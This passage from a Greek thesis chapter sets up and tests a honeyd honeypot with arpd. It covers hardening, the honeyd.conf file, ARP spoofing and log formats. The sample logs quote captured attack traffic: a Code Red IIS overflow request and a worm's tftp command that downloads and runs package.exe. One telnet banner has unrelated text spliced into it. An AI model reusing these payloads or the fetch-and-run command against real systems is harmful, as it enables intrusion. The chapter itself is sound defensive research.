ΚΕΦΑΛΑΙΟ 3 ΔΟΚΙΜΗ ΤΟΥ HONEYD ΚΑΙ ΤΩΝ VIRTUAL HOSTS

Μέγεθος: px
Εμφάνιση ξεκινά από τη σελίδα:

Download "ΚΕΦΑΛΑΙΟ 3 ΔΟΚΙΜΗ ΤΟΥ HONEYD ΚΑΙ ΤΩΝ VIRTUAL HOSTS"

Transcript

1 ΚΕΦΑΛΑΙΟ 3 ΔΟΚΙΜΗ ΤΟΥ HONEYD ΚΑΙ ΤΩΝ VIRTUAL HOSTS Εισαγωγή Στο πείραμα που πραγματοποιήθηκε το honeyd δημιουργεί και προσομοιώνει 3 virtual hosts και έναν τέταρτο default, ο οποίος θα δέχεται τις αιτήσεις προς οποιαδήποτε ip του C class δικτύου μας. Δηλαδή δημιουργούμε 3 virtual hosts, που πιάνουν τις ip s απο και έναν default host ο οποίος θα απαντάει για όλες τις άλλες ip s του δικτύου. Αυτό γίνεται γιατι προσπαθούμε να πιάσουμε όλη την κίνηση που μπορούμε και με το να έχουμε στη διάθεση μας 254 hosts θα πιάσουμε πολύ μεγαλύτερη κίνηση απ ότι με 4 hosts. Εικόνα 3.1 -δημιουργία virtual hosts από ένα honeyd host. Θέματα πάνω στην εγκατάσταση και ασφάλεια του συστήματος Εγκαταστάθηκε το slackware linux (έκδοση 10.0) σε ένα μηχάνημα χαμηλών δυνατοτήτων (pentium2) στο οποίο θα τρέχει το honeyd, δόθηκε το hostname ikaria και έγινε system hardening ώστε το σύστημα να είναι ασφαλές από τις δικτυακές επιθέσεις. Πιο συγκεκριμένα: έγινε minimum setup υπηρεσιών, ώστε να τρέχουν μόνο οι απαραίτητες απενεργοποιήθηκαν όλες οι περιττές δικτυακές υπηρεσίες εκτός από ssh για remote - 1 -

2 πρόσβαση στο σύστημα και το syslogd για καταγραφή των συμβάντων περάστηκαν τα patches από την έκδοση 10.0 και μετά έγινε recompile στον πυρήνα για καλύτερη επίδοση επιπλέον βήματα για την ασφάλεια του συστήματος θα μπορούσαν να αποτελέσουν το Bastille linux (σύνολο από scripts για system hardening), κάποιο kernel patch όπως το grsecurity, ή το openwall. Τα kernel patches είναι patches που εφαρμόζονται στον πυρήνα - και άρα θέλει recompile-και προσφέρουν σημαντική προστασία, παράδειγμα αποτρέπουν οποιαδήποτε επίθεση buffer overflow. αν και δεν έχει συμβεί μέχρι σήμερα θα μπορούσε να βρεθεί κάποιο remote exploit για το honeyd (αν και σε περίπτωση όπως στη δική μας που φιλτράρεται ο honeyd host και δεν είναι προσβάσιμος απέξω δεν θα επηρέαζε) και με αυτό τον τρόπο να αποκτήσει κάποιος πρόσβαση στον honeyd host. Γι αυτό μεταξύ των λύσεων που θα μπορούσαν να χρησιμοποιηθούν είναι η εκτέλεση του honeyd σε chroot περιβάλλον ή μέσω του systraceέτσι είναι πολύ πιο δύσκολο να πάρει κάποιος root. Το systrace αρχικά τρέχει το honeyd και από μόνο του δημιουργεί την πολιτική για αυτό και συγκεκριμένα καταγράφει ποιες κλήσεις συστήματος -system calls-καλεί το honeyd και όταν αυτό ξεκινάει κατω από το systrace, αν γίνει κάποια κλήση συστήματος η οποία δεν είναι καταγραμμένη στην πολιτική, το systrace δεν της επιτρέπει να εκτελεστεί. Κάθε φορά που γίνεται αλλαγή στο honeyd.conf, πχ προσθήκη μιας υπηρεσίας, θα πρέπει το systrace να επανεκτελείται για να καταγράψει τις αλλαγές. Μελετήθηκε η χρήση αυθεντικοποίησης με δημόσιο κλειδί (public key ssh authentication) για remote administration στον honeyd host αντί χρήσης κωδικών. Δεν υπάρχει λόγος το honeyd να είναι προσβάσιμο από το internet, γι αυτό μπλοκάρονται όλες οι εισερχόμενες/εξερχόμενες συνδέσεις προς/από τον ikaria. Έπειτα εγκαταστάθηκε η πιο πρόσφατη έκδοση του honeyd, η 1.0, η οποία μάλιστα κυκλοφόρησε πριν από λίγες μέρες. Η εγκατάσταση του honeyd είναι εύκολη δουλειά ακόμα και για αρχάριους στο linux, ενώ υπάρχει έκδοση του honeyd και για τα Microsoft windows. Στο παράρτημα της διπλωματικής υπάρχουν οδηγίες για την εγκατάσταση του honeyd. Δρομολόγηση των συνδέσεων Η δρομολόγηση των συνδέσεων που προορίζονται για τις ip s του δικτύου μας μπορεί να γίνει με 3 τρόπους: Να ορίσουμε ρητά τα route στον router μας που κατευθύνουν το μέρος του δικτύου που θέλουμε να δώσουμε στα virtual hosts, στο honeyd host. Το μειονέκτημα του είναι ότι θέλει ρύθμιση στον router κάτι που σημαίνει ότι πρέπει να έχουμε πρόσβαση σε αυτόν. Είναι προτιμότερο να το αποφύγουμε και να προτιμήσουμε κάποια λύση που έχει να κάνει μόνο με το μηχάνημα μας. Με κάνουμε χρήση της δυνατότητας arp-proxy στον router. Το arp-proxy μπορεί να συσχετίσει ip διευθύνσεις που δεν έχουν δεσμευτεί με τη διεύθυνση MAC του host που του ορίζουμε, στατικά όμως και όχι δυναμικά όπως το arpd. Πολύ χρήσιμο για περιπτώσεις όπου έχουμε λίγες ip's που θέλουμε να αντιστοιχίσουμε σε μια Mac adress και έτσι αποφεύγουμε το arp spoofing σε ολόκληρο το δίκτυο. Να κάνουμε χρήση του arpd, το οποίο βρίσκει τις διευθύνσεις που δεν χρησιμοποιούνται στο δίκτυο που του δίνουμε και οποιαδήποτε αίτηση για διεύθυνση του δικτύου αυτού περνάει στο honeyd host (arp spoofing). Αυτό βολεύει στην περίπτωση που έχουμε ένα ολόκληρο δίκτυο πχ C class το οποίο έχει ips που χρησιμοποιούνται αλλά και αδέσμευτες και θέλουμε να δώσουμε τις αδέσμευτες για παρακολούθηση, με δυναμική εύρεση αυτών

3 Λειτουργία arpd Η δουλειά του arpd είναι να παρατηρεί την κίνηση για το δίκτυο ή υποδίκτυο που του ορίζουμε και να απαντά με τη διεύθυνση MAC του host στον οποίο τρέχει για τις αιτήσεις που γίνονται. Δηλαδή απαντάει στα πακέτα που προορίζονται για ανενεργές IP s σαν να προορίζονταν για τον host στον οποίο τρέχει το arpd. Σε ένα δίκτυο το arpd μπορεί να δημιουργήσει ένα σωρό προβλήματα, πχ αν τρέχει dhcp στο δίκτυο δεν θα δουλεύει, γιατί το arpd θα απαντάει σε όλες τις αιτήσεις και θα φαίνεται πως όλες οι διευθύνσεις είναι πιασμένες. Επίσης μπορεί να κλέψει την IP νόμιμων hosts και να απαντάει στη θέση τους. Αυτό λέγεται arp spoofing και εκμεταλλεύεται ένα κενό στη λειτουργία του πρωτοκόλλου arp. Αξίζει να δει κανείς ποιο είναι το κενό αυτό στο arp, γιατί αποτελεί μια χαρακτηριστική περίπτωση του πώς είτε από κακό σχεδιασμό ή για λόγους διευκόλυνσης τα βασικά πρωτόκολλα που αποτελούν το internet, το tcp, το arp, το bgp και άλλα, η ραχοκοκαλιά του δηλαδή, έχουν σοβαρές τρύπες στην ασφάλεια τους που σχετικά εύκολα μπορεί να εκμεταλλευτεί κανείς. Το πρωτόκολλο arp (address resolution protocol) αντιστοιχεί ip διευθύνσεις σε ethernet διευθύνσεις. Όταν ένας host θέλει να εγκαταστήσει μια σύνδεση, στέλνει ένα arp broadcast που φέρει την ip διεύθυνση με την οποία θέλει να επικοινωνήσει και ζητάει να του επιστραφεί η Mac διεύθυνση για να μπορέσει να εγκαταστήσει τη σύνδεση. Για λόγους ευκολίας, το σύστημα arp παρέχει ένα arp cache, έναν πίνακα που αποθηκεύει Mac διευθύνσεις για ευκολία, ώστε οι μηχανές να μπορούν να συνδεθούν γρήγορα σε γνωστούς hosts, σε hosts δηλαδή με τους οποίους έχουν επικοινωνήσει ήδη, χωρίς να πρέπει να στείλουν ένα broadcast και να ρωτούν ποια διεύθυνση έχουν. Στο arp spoofing ο επιτιθέμενος host παρακολουθεί συνέχεια το δίκτυο και μόλις δει κάποια αίτηση για οποιαδήποτε ip, αφού περιμένει λίγο χρόνο ώστε να σιγουρευτεί ότι κανένας host δε στέλνει απάντηση -και άρα δεν τη χρησιμοποιεί κανείς-στέλνει απάντηση ότι η ip αυτή έχει hardware διεύθυνση τη δικιά του Mac address. Έτσι ο host που έψαχνε για την ip αποθηκεύει στην cache του την αντιστοιχία Mac διεύθυνση με την ip. Με την εντολή arp του unix βλέπουμε τον πίνακα arp που κρατάει ο υπολογιστής μας. Οι τιμές αυτές διατηρούνται για μερικά λεπτά μόνο. Το arpd γράφτηκε το 2001 από τον Dug Song, αλλά απο τότε δεν έχει ασχοληθεί κανείς με τον κώδικα του. Πιο εξειδικευμένα εργαλεία όπως τα hunt, ettercap, dsniff, arpspoof κάνουν arp spoofing και χρησιμοποιούνται για man-in-the-middle attacks, μια απο τις πιο δύσκολες να αποτραπούν κατηγορίες επιθέσεων και για αυτά υπάρχει αρκετό documentation. Το παρακάτω σενάριο δείχνει τη λειτουργία του arpd: root@ikaria:/usr/honeyd#./arpd -d -i eth /24-3 -

4 arpd[568]: listening on eth0: arp and (dst net /24) and not ether src 00:90:27:22:86:00 (ξεκινάει το arpd στον ikaria) arpd[568]: arpd_lookup: no entry for arpd[568]: arpd_send: who-has tell arpd[568]: arpd_send: who-has tell arpd[568]: arp reply is-at 00:90:27:22:86:00 tcpdump arp (σε άλλο παράθυρο τρέχει το tcpdump και κοιτάζει μόνο τα πακέτα του πρωτοκόλλου arp) 12:43: arp who-has tell :43: arp who-has (Broadcast) tell :43: arp who-has olympos.lab.epmhs.gr tell :43: arp reply olympos.lab.epmhs.gr is-at 00:02:b3:48:7c:8f 12:43: arp who-has (Broadcast) tell :44: arp who-has tell :44: arp reply is-at 00:90:27:22:86:00 Ο host ζητάει να μάθει την Mac address του Το arpd προωθεί την ερώτηση και εφόσον δεν παίρνει απάντηση από πουθενά εντός λίγων δευτερολέπτων, απαντάει ότι το έχει Mac address αυτή του ikaria! Απαντάει δηλαδή με τη δική του Mac σε οποιαδήποτε αίτηση γίνεται και δεν απαντάει κάποιος άλλος host. HONEYD version 1.0 Η πιο πρόσφατη έκδοση του honeyd είναι η έκδοση 1.0. Περιλαμβάνει web server ο οποίος εμφανίζει βασικές πληροφορίες για τη ρύθμιση του honeyd, πόσα virtual hosts δημιουργήθηκαν και με τι λειτουργικό σύστημα το καθένα, καθώς επίσης και ποιες υπηρεσίες προσομοιώνουν και ποιο πρωτόκολλο -tcp ή udp-και κάποια λίγα στατιστικά, όπως τον αριθμό των tcp ή udp συνδέσεων που έγιναν. Εγκαθίσταται στο /usr/local/share/honeyd και ξεκινώντας ρίχνει τα προνόμια σε 32767:32767 ώστε να μην τρέχει σαν root, έτσι ώστε αν κάποια επίθεση στο honeyd καταφέρει να το σπάσει να μην αποδώσει και προνόμια root. Η τεχνική αυτή, να ξεκινάει μια υπηρεσία απο τον root και αμέσως να ρίχνει τα προνόμια χρησιμοποείται από τον apache web server, την mysql και πολλές άλλες διάσημες υπηρεσίες. Το honeyd εγκαθίσταται στο /usr/honeyd/honeyd-1.0/ και τα logs θα μπαίνουν στο /usr/honeyd/log/

5 Το αρχείο με τις ρυθμίσεις που ορίζει ποια virtual hosts θα δημιουργηθούν, ποιες υπηρεσίες και λειτουργικό σύστημα θα προσομειώνει το καθένα και ποιες ip s θα πάρουν, είναι το honeyd.conf. Το αρχείο αυτό έχει πολύ εύκολη σύνταξη, ενώ στο πείραμα που πραγματοποιήθηκε χρειάστηκε να τροποποιηθεί αρκετές φορές. Η ρύθμιση του honeyd.conf είναι η παρακάτω: root@ikaria:/usr/honeyd/honeyd-1.0# cat honeyd.conf create default set default personality Microsoft Windows XP Professional SP1 set default uptime set default maxfds 35 add default tcp port 80 scripts/win2k/iisemulator-0.95/iisemul8.pl add default tcp port 22 sh scripts/test.sh $ipsrc $dport #add default tcp port 22 proxy $ipsrc:22 #add default udp port 53 proxy :53 add default tcp port 135 open add default tcp port 21 sh scripts/win2k/msftp.sh $ipsrc $sport $ipdst $dport add default tcp port 143 sh scripts/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport add default tcp port 25 sh scripts/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport add default tcp port 137 proxy $ipsrc:137 add default tcp port 138 proxy $ipsrc:138 add default tcp port 139 proxy $ipsrc:139 add default tcp port 445 proxy $ipsrc:445 add default tcp port 1080 scripts/mydoom.pl add default tcp port 3127 scripts/mydoom.pl add default tcp port 3128 scripts/mydoom.pl add default tcp port scripts/mydoom.pl add default tcp port 4444 sh scripts/4444.sh $ipsrc $ipdst add default tcp port 5554 scripts/cmdexe.pl -p winxp add default tcp port 9996 scripts/cmdexe.pl -p winxp add default tcp port 8967 scripts/cmdexe.pl -p winxp add default tcp port scripts/cmdexe.pl -p winxp add default tcp port 3117 scripts/cmdexe.pl -p winxp set default default tcp action reset set default default udp action reset - 5 -

6 set default default icmp action open create router set router personality Cisco 1601R router running IOS 12.1(5) set router default tcp action reset set router default udp action reset add router tcp port 22 scripts/test.sh add router tcp port 23 scripts/router-telnet.pl set router uptime create linux set linux personality Linux kernel add linux tcp port 80 sh scripts/suse8.0/apache.sh $ipsrc $sport $ipdst $dport add linux tcp port 21 sh scripts/suse8.0/proftpd.sh $ipsrc $sport $ipdst $dport add linux tcp port 25 sh scripts/suse8.0/sendmail.sh $ipsrc $sport $ipdst $dport add linux tcp port 22 sh scripts/suse8.0/ssh.sh $ipsrc $sport $ipdst $dport add linux tcp port 110 sh scripts/suse8.0/qpop.sh $ipsrc $sport $ipdst $dport add linux tcp port 143 sh scripts/suse8.0/cyrus-imapd.sh $ipsrc $sport $ipdst $dport add linux tcp port 8080 sh scripts/suse8.0/squid.sh $ipsrc $sport $ipdst $dport add linux udp port 514 sh scripts/suse8.0/syslogd.sh $ipsrc $sport $ipdst $dport set linux default tcp action reset set linux default udp action reset set linux default icmp action open set linux uptime create relay set relay personality Sun Solaris 9 set relay default tcp action reset set relay default udp action reset add relay tcp port 25 scripts/smtp.pl -q add relay tcp port 8080 scripts/proxy.pl bind router bind default bind linux bind relay - 6 -

7 Αρχικά η εντολή create δημιουργεί ένα template, το οποίο ρυθμίζει τα virtual hosts. Η εντολή set δίνει την προσωπικότητα στο virtual host, δηλαδή το λειτουργικό σύστημα το οποίο προσομοιώνει και αν θέλουμε και επιπλέον ρυθμίσεις, όπως το uptime. Παραπάνω το αρχείο ρύθμισης του honeyd δημιουργεί τέσσερα templates, με τα εξής λειτουργικά συστήματα: Microsoft Windows XP Professional SP1, Cisco 1601R router running IOS 12.1(5), Linux kernel και Sun Solaris 9. Η add περιγράφει τις υπηρεσίες που θα είναι προσβάσιμες, στις οποίες προσδιορίζουμε το πρωτόκολλο (tcp ή udp), την πόρτα στην οποία ακούνε (πχ 80) καιτην εντολή που θα εκτελείται για την υπηρεσία αυτή (πχ scripts/web.sh). Με την set επίσης ορίζουμε την default συμπεριφορά των δικτυακών πρωτοκόλλων : block κάνει drop όλα τα πακέτα, reset κλείνει όλες τις πόρτες και εμείς ορίζουμε ποιες θα είναι ανοικτές και open αφήνει όλες τις πόρτες ανοικτές. Παράδειγμα στον linux virtual host πέρα από τις πόρτες 21, 22, 25, 80, 110, 514, 8080 τις οποίες ανοίγουμε και μάλιστα ορίζουμε και κάποιες υπηρεσίες να τρέχουν σε αυτές τις πόρτες, οι υπόλοιπες tcp και udp πόρτες είναι κλειστές. Το icmp είναι φυσικά ανοικτό, ώστε να απαντάει ο host σε pings που του γίνονται. Με την εντολή bind ip template ορίζουμε ποια ip θα καταλαμβάνει το κάθε template που δημιουργήσαμε. Το πρώτο template με το όνομα default πέρα απο την ip που του ορίζουμε -bind default-θα αντιστοιχεί τον virtual host default σε οποιαδήποτε ip βρίσκει ελεύθερη στο δίκτυο. Αυτό το καταφέρνει προφανώς με τη βοήθεια του arpd, όπως περιγράφεται παραπάνω. Μόλις το arpd εντοπίσει στο δίκτυο πως γίνεται μια αίτηση για κάποια ip που δεν χρησιμοποιείται, το arpd απαντάει με τη Mac διεύθυνση του honeyd host. Το honeyd αντιστοιχεί σε αυτή την ip κάποιο απο τα virtual hosts που έχουμε ορίσει, αν προορίζεται για αυτή την ip, αλλιώς την αντιστοιχεί στον default virtual host -το default είναι δεσμευμένη λέξη για τα templates από το honeyd. Το γεγονός οτι μια πόρτα είναι ανοικτή αλλά δεν τρέχει κάποια υπηρεσία σε αυτή σημαίνει οτι όταν κάποιος host επιχειρήσει σύνδεση με αυτή την πόρτα, το honeyd θα καταγράψει τη σύνδεση που έγινε, αλλά δεν θα μπορεί να δωθεί κάποια απάντηση, αφού δεν τρέχει κάποια υπηρεσία. Συνοπτικός πίνακας των virtual hosts Host λειτουργικό Υπηρεσία που προσομοιώνεται πόρτα πρωτόκολλο Router Cisco 1601R IOS 12.1(5)" ssh 22 tcp - 7 -

8 Default tcp/udp action reset,icmp open telnet 23 tcp Default Windows XP Professional SP1 ms ftp 21 tcp ssh 22 tcp smtp 25 tcp iis web server 80 tcp file sharing/netbios 135,137,1 38,139,44 5 tcp exchange-imap 143 tcp mydoom worm 1080 tcp backdoor mydoom worm backdoor mydoom worm backdoor mydoom worm backdoor 3117 tcp 3127 tcp 3128 tcp MBsblast cleaner 4444 tcp cmd prompt 5554 tcp cmd prompt 8967 tcp cmd prompt 9996 tcp cmd prompt tcp cmd prompt tcp Default tcp/udp action reset,icmp open Linux Linux kernel proftpd 21 tcp ssh 22 tcp sendmail 25 tcp apache 80 tcp qpop 110 tcp cyrus imapd 143 tcp squid web proxy 8080 tcp syslogd 514 udp - 8 -

9 Default tcp/udp action reset,icmp open Relay Sun solaris 9 fake open mail relay server 25 tcp fake open proxy 8080 tcp Default tcp/udp action reset,icmp open Οι περισσότερες από τις υπηρεσίες που προσημειώνονται περιέχονται στον φάκελο scripts/ του ίδιου του honeyd. Επιπλέον υπηρεσίες υπάρχουν στην επίσημη σελίδα του honeyd. Σχόλια πάνω στο configuration file. Για το windows xp virtual host είναι ρυθμισμένες οι εξής υπηρεσίες, ώστε το σύστημα να φαίνεται περισσότερο αληθινό: web server (IIS 5.0) που περιλαμβάνει wwwroot με ιστοσελίδες και iis_data με σελίδες των μηνυμάτων λάθους. msftp ftp server, ssh το οποίο εμφανίζει ένα ssh prompt και απλά καταγράφει τα ονόματα που δέχεται, ms exchange 2000 imap4rev1 imap server, exchange smtp server. Οι πόρτες 135, 137, 138, 139 και 445 είναι ανοικτές ώστε να μπορούν να γίνονται συνδέσεις. Τις πόρτες αυτές χρησιμοποιούν τα windows για file sharing/netbios. Στις πόρτες 1080, 3127, 3128, ακούει ένα emulator του backdor που εγκαθιστά το worm mydoom το οποίο log-άρει τα uploaded αρχεία που ανεβάζει το worm και καταγράφει τις προσπάθειες σύνδεσης. Στις πόρτες 5554, 9996, 20168, 3117 τρέχει το script cmdexe.pl, το οποίο είναι emulator για dos command prompt. Τις πόρτες αυτές χρησιμοποιούν πολλά worms, όπως ο sasser,ο msblaster και άλλοι. Στην πόρτα 4444 τρέχει το script 4444.sh, το οποίο εκτελεί κάποιες εντολές και προσπαθεί να καθαρίσει τον host που του κάνει επίθεση και προσπαθεί να τον μολύνει, από τον ιο blaster (περισσότερα γι αυτό παρακάτω). Στη συνέχεια του πειράματος δημιουργήθηκε και προστέθηκε script που επιχειρεί να καθαρίσει όποιον μολυσμένο host του επιτίθεται απο το worm sasser. Για το linux virtual host ρυθμίστηκαν διάφορες τυπικές υπηρεσίες ενός linux συστήματος, όπως προσομοίωση apache web server, proftpd ftp server, ssh server, sendmail server, syslogd, imapd, squid proxy. Για το router virtual host ρυθμίστηκαν μόνο δυο υπηρεσίες, telnet και ssh. Τέλος το solaris virtual host τρέχει δυο script, τα οποία δημιουργούν έναν fake open relay mail - 9 -

10 server (στην πόρτα 25) και έναν fake open proxy (στην πόρτα 8080). Οι δυο αυτές υπηρεσίες ρυθμίστηκαν ώστε να αποτελούν μια παγίδα για spammers οι οποίοι θα ξεγελαστούν, νομίζοντας ότι θα μπορούν να στείλουν τα spam τους. ΔΟΚΙΜΗ ΤΟΥ HONEYD Πρώτα ξεκινάμε το arpd ώστε η δρομολόγηση των συνδέσεων προς τους virtual hosts που το honeyd δημιουργεί να είναι εφικτή: -d -i eth /24 arpd[254]: listening on eth0: arp and (dst net /24) and not ether src 00:90:27:22:86:00 Έπειτα ξεκινάμε το honeyd: -u 99 -g 99 -d -l /usr/honeyd/log/messages -p nmap.prints -f honeyd.conf /24 Honeyd V1.0 Copyright (c) Niels Provos honeyd[284]: started with -d -l /usr/honeyd/log/messages -p nmap.prints -f honeyd.conf Warning: Impossible SI range in Class fingerprint IBM OS/400 V4R2M0 Warning: Impossible SI range in Class fingerprint Microsoft Windows NT 4.0 SP3 honeyd[284]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip and (dst net /24))) and not ether src 00:90:27:22:86:00 honeyd[284]: HTTP server listening on port 80 honeyd[284]: HTTP server root at /usr/local/share/honeyd/webserver/htdocs honeyd[284]: Demoting process privileges to uid 32767, gid honeyd[284]:... Τα switches με τα οποία ξεκινάει το honeyd είναι τα εξής: -d το honeyd θα τρέχει σαν daemon -l /path/to/file το αρχείο στο οποίο αποθηκεύονται τα μηνύματα -p nmap.prints θα χρησιμοποιεί το αρχείο nmap.prints για να πάρει τα fingerprints των λειτουργικών συστημάτων -f honeyd.conf θα χρησιμοποιεί το αρχείο honeyd.conf για τη ρύθμιση του. -u 99 -g 99 τρέχει με τα δικαιώματα του χρήστη nobody, που είναι τα χαμηλότερα, ώστε σε περίπτωση που στο μέλλον βρεθεί κάποιο bug στο honeyd να μην παίρνει root. Για το λόγο αυτό τα δικαιώματα στους φακέλους που χρησιμοποιεί το honeyd ρυθμίστηκαν ανάλογα

11 /24 το ip range στο οποίο θα τρέχουν οι virtual hosts. Οι συνδέσεις γίνονται από τον pluto.lab.epmhs.gr. telnet Trying Connected to Escape character is ^]. Users (authorized or unauthorized) have no explicit or implicit expectation of privacy. Any or all uses of this system may be intercepted, monitored, reca), the legality of my research or these web pages is currently unclear. Felten provides additional information about the resulting restrictions on technology and research. Potentially offending web content has been moved to the Netherlands. Please, support the EFF.corded, copied, audited, inspected, and disclosed to authorized site, and law enforcement personnel, as well as to authorized officials of other agencies, both domestic and foreign. By using this system, the user consents to such interception, monitoring, recording, copying, auditing, inspection, and disclosure at the discretion of authorized site. Unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning. User Access Verification Username: mpeeeeeeeee Password: % Access denied Ξεκινάμε μια σύνδεση από τον pluto.lab.epmhs.gr στον στην θύρα 23 (telnet). Το honeyd βγάζει το παραπάνω banner, όπως θα έβγαζε κάποιος router, και μας ζητάει να δώσουμε username/ password. Καταγράφει στο log file την απόπειρα σύνδεσης που έγινε καθώς επίσης και το ζεύγος username/ password που δώσαμε. Connection request: tcp (1xx.xxx.x.30: :23) honeyd[284]: Connection established: tcp (1xx.xxx.x.30: :23) <-> scripts/routertelnet.pl honeyd[284]: E(1xx.xxx.x.30: :23): Attempted login: mpeeeeeeeee/!

12 Καταγραφή συνδέσεων Η καταγραφή των συνδέσεων από το honeyd γίνεται στα αρχεία messages, messages-base, mydoom, cmdexe και στο φάκελο spam/. Το honeyd καταγράφει τις συνδέσεις που έγιναν στα virtual hosts στο αρχείο messages, με την εξής μορφή: :27: udp(17) : :28: tcp(6) S [Windows XP SP1] :28: tcp(6) : 48 S [Windows XP SP1] :48: tcp(6) S [Linux 2.6 ] :48: tcp(6) S [Linux 2.6 ] :37: tcp(6) : 40 R [FreeBSD ] :54: tcp(6) : 60 S [FreeBSD ] όπου ημερομηνία που έγινε η σύνδεση 18:27: ώρα, με ιδιαίτερα μεγάλη ακρίβεια udp πρωτόκολλο (udp, tcp, icmp) host απο τον οποίο έγινε η σύνδεση (source host) 5338 πόρτα απο την οποία έγινε η σύνδεση (source port) ο virtual host που δέχτηκε την σύνδεση (destination host) 1027: η πόρτα στην οποία έγινε η σύνδεση (destination port) Windows XP SP1 το λειτουργικό το οποίο έχει ο source host -το βρίσκει με passive fingerprinting, σε ποσοστό κοντά στο 50%. Το αρχείο messages είναι το κύριο αρχείο από το οποίο θα εξάγουμε στατιστικά για τις

13 συνδέσεις και επιθέσεις που δέχτηκαν οι virtual hosts. Είναι χρήσιμο για να μάθουμε πόσες συνδέσεις και με ποιο πρωτόκολλο έγιναν στα virtual hosts μας, πόσες από αυτές εγκαταστάθηκαν και δεν ήταν απλώς port scannings, ποιες είναι οι πιο ενεργές πόρτες, ποια λειτουργικά έκαναν τις συνδέσεις. Από τα logs του honeyd παίρνουμε τις παραπάνω βασικές πληροφορίες, αλλά τα συμπεράσματα γύρω από τις επιθέσεις βγαίνουν σε συνδυασμό με το snort ή κάποιο άλλο ids. (πχ αριθμός και φύση των alerts που δημιουργήθηκαν). Οι διάφορες υπηρεσίες που τρέχουν οι virtual hosts -πχ apache, sendmail, ssh κατέχουν ρυθμιστεί να καταγράφουν τις συνδέσεις στο αρχείο messages-base. Αυτό για να έχουμε ένα αρχείο με τις καταγραφές από τις υπηρεσίες και όχι πολλά. Η ρύθμιση αυτή έγινε με μικρή παρέμβαση στα scripts που προσομοιώνουν τις υπηρεσίες, ώστε η μεταβλητή LOG να είναι το messages-base Για παράδειγμα: --MARK--,"Thu Feb 17 04:32:39 EET 2005", "apache/http", " ", " ",4521,80, " GET /default.ida?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u 7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u81 90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 ", --ENDMARK- όπου Thu Feb 17 04:32:39 EET 2005 η ημερομηνία και ώρα σύνδεσης apache/http η υπηρεσία που χρησιμοποιήθηκε ο source host o destination host 4521 η πόρτα που χρησιμοποίησε ο source host για να επιχειρήσει σύνδεση 80 η πόρτα στην οποία δέχτηκε σύνδεση ο virtual host. Το Get default.ida? XX... είναι η εντολή που έστειλε ο source host. Με μια γρήγορη αναζήτηση στο google.com ενημερωνόμαστε ότι η κίνηση αυτή προέρχεται από microsoft windows υπολογιστές μολυσμένους από το worm code red καθώς επίσης και διάφορες

14 εκδοχές του, που ψάχνουν για IIS servers και προσπαθούν να εκμεταλλευτούν κάποιο κενό στην ασφάλεια του iis ώστε να μολύνουν άλλα συστήματα [1]. Δεδομένου ότι το πρόβλημα αυτό είναι για τον web server της Microsoft -τον iis-και εμείς τρέχουμε προσομείωση apache, συμπεραίνουμε ότι είτε ο επιτιθέμενος είναι κάποιος με περιορισμένες γνώσεις είτε πρόκειται για μολυσμένο υπολογιστή από κάποιο worm. Στο αρχείο mydoom καταγράφονται οι συνδέσεις που έγιναν από τον emulator του worm mydoom και πιο συγκεκριμένα οι συνδέσεις από μολυσμένους από τον ιο hosts. Τα αρχεία επίσης που ανεβάζει ο ιός αποθηκεύονται σε φακέλους. Παράδειγμα: :55: : mydoom.pl[10567]: connection from :4786 to : :55: : mydoom.pl[10567]: file upload attempt from : :55: : mydoom.pl[10567]: file uploaded to /usr/honeyd/log//65/23/245/85/4786/file.10567, byte(s) written Στο αρχείο cmdexe καταγράφονται οι συνδέσεις στις πόρτες 5554, 9996, 20168, 3117, όπου τα διάφορα worms που εκκινούν σύνδεση σε μια από αυτές τις πόρτες νομίζουν ότι τρέχει κάποιο dos command prompt. Παράδειγμα: :57: : cmdexe.pl[310]: connection from :4297 to : :57: : cmdexe.pl[310]: cmd: USER x :57: : cmdexe.pl[310]: cmd: PASS x :57: : cmdexe.pl[311]: connection from :2140 to : :57: : cmdexe.pl[311]: cmd: tftp -i GET h package.exe & package.exe & exit :57: : cmdexe.pl[311]: hex: :57: : cmdexe.pl[311]: forced exit of cmdexe.pl (eg, ^C in a connection) Στην περίπτωση αυτή ο host είναι μολυσμένος από το worm dabber, το οποίο εκμεταλλεύεται το backdoor που αφήνει το worm sasser αφού μολύνει έναν host για να μεταδοθεί και αυτό το καταλαβαίνουμε από την εντολή tftp -i GET h package.exe & package.exe. Πρόκειται για το πρώτο worm που εξαπλώνεται εκμεταλλεύοντας ένα bug σε κάποιο worm το οποίο έχει ήδη μολύνει έναν υπολογιστή! Περισσότερα για τα worms και τον sasser στα επόμενα κεφάλαια

15 Τέλος, στο φάκελο spam αποθηκεύεται το spam και καταγράφονται οι συνδέσεις που έγιναν απο spammers. Τη δουλειά αυτή την εκτελεί ο fake open mail relay server που τρέχει στον solaris virtual host, λειτουργεί σαν παγίδα για spammers. Η καταγραφή γίνεται ως εξής; Στο αρχείο spam/logfile καταγράφονται οι συνδέσεις από τους spammers με τη μορφή Sat, 26 Feb :22: (EET): : Nr d0/1 όπου Sat, 26 Feb :22: (EET): ημερομηνία και ώρα που χρησιμοποίησε ο spammer σαν αποστολέας που χρησιμοποίησε ο spammer σαν αποδέκτης η ip του spammer. Στον φάκελο spam/queue αλλά και σε φακέλους που δημιουργούνται στον φάκελο spam/ αποθηκεύονται τα spam -τα οποία φυσικά δεν προωθούνται. Περισσότερα για τον τρόπο με τον οποίο δουλεύουν οι spammers, πως προωθείται το spam αλλά και πως το honeyd προσπαθεί να το αντιμετωπίσει, στο κεφάλαιο πολεμώντας το spam. Δοκιμές των virtual hosts Προτού αφήσουμε το honeyd και τα virtual hosts που 